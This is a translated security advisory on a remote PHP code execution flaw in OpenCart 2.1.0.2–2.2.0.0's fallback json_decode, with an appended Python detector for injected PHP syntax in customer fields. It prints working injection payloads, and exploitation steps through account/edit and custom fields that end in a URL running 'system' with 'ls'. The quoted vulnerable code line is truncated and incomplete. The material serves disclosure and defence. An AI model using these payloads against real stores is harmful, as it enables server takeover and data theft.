A remote PHP code execution vulnerability exists in the OpenCart json_decode function

2016-04-12 14:12:56 | Source: 360 Security Broadcast | Author: Dark Feather Meow


Security researcher Naser Farhadi (Twitter: @naserfarhadi) recently found a remote PHP code execution vulnerability in OpenCart's json_decode function, affecting versions 2.1.0.2 through 2.2.0.0 (the latest version at the time of writing).

The vulnerability is in /upload/system/helper/json.php, in the following code:

# /upload/system/helper/json.php
$match = '/'. *? (?

This fallback json_decode builds PHP code from the JSON text and evaluates it, so the contents of JSON strings are interpreted as PHP and json_decode itself can be exploited.

Here are a few simple test cases:

var_dump(json_decode('{"OK": "1"."2"."3"}'));

var_dump(json_decode('{"OK": "$_SERVER[HTTP_USER_AGENT]"}'));

var_dump(json_decode('{"OK": "{$_GET[b]($_GET[c])}"}'));

In a real deployment, the vulnerability can be exploited through /index.php?route=account/edit.

For example, enter $_SERVER[HTTP_USER_AGENT] as the name and save (this needs to be done twice).

When the administrator then opens the admin panel, the recent activity list shows the administrator's own User-Agent string in the place where the customer's name should appear.

Another vector is the custom_field in account/edit or account/register, which is probably the most convenient one.

If the administrator has added a custom field under /admin/index.php?route=customer/custom_field to collect extra information such as a phone number, code can be injected directly into that custom_field.

For example, enter {$_GET[b]($_GET[c])} into the custom_field and save.

Then visit

http://host/shop_directory/index.php?route=account/edit&b=system&c=ls

and the code is executed.

Note that this only works when the PHP JSON extension is not installed, because OpenCart's own json_decode helper is only used in that case.
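As an added triage example (not part of the advisory, and not OpenCart code), the following Python script scans stored customer values from the injection points named above for the PHP interpolation syntax that the fallback json_decode would evaluate; the record layout and sample values are constructed.

```python
import re

# Constructed sample of stored customer data: the fields the advisory names as
# injection points (name fields saved via account/edit and custom_field values).
SAMPLE_RECORDS = [
    {"customer_id": 1, "field": "firstname", "value": "Alice"},
    {"customer_id": 2, "field": "firstname", "value": "$_SERVER[HTTP_USER_AGENT]"},
    {"customer_id": 3, "field": "custom_field", "value": "{$_GET[b]($_GET[c])}"},
    {"customer_id": 4, "field": "custom_field", "value": '1"."2"."3'},
    {"customer_id": 5, "field": "lastname", "value": "O'Brien"},
    {"customer_id": 6, "field": "custom_field", "value": "Price: $5 or 50%"},
]

# Constructs that are inert inside a JSON string but become live PHP once the
# fallback json_decode turns the JSON text into PHP source and evaluates it.
PHP_INTERPOLATION = re.compile(
    r'\{\$'                  # complex syntax: {$_GET[b]($_GET[c])}
    r'|\$\{'                 # ${expr} interpolation
    r'|\$[A-Za-z_]\w*'       # simple variable interpolation: $_SERVER[...], $x
    r'|"\s*\.\s*"'           # closing the string and concatenating: "1"."2"
)


def find_php_interpolation(value: str) -> list[str]:
    """Return the PHP interpolation tokens found in one stored value."""
    return PHP_INTERPOLATION.findall(value)


def scan_records(records: list[dict]) -> list[dict]:
    """Flag every record whose value the fallback would interpret as PHP."""
    findings = []
    for rec in records:
        hits = find_php_interpolation(rec["value"])
        if hits:
            findings.append({"customer_id": rec["customer_id"],
                             "field": rec["field"], "hits": hits})
    return findings


if __name__ == "__main__":
    for f in scan_records(SAMPLE_RECORDS):
        print(f"customer {f['customer_id']} {f['field']}: {f['hits']}")
```

A plain dollar sign followed by a digit (a price) is not flagged, since PHP only interpolates `$` followed by an identifier.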

This article was translated by 360 Security Broadcast; when reprinting, please credit "Transferred from 360 Security Broadcast" and include a link.

Original link: http://seclists.org/bugtraq/2016/Apr/61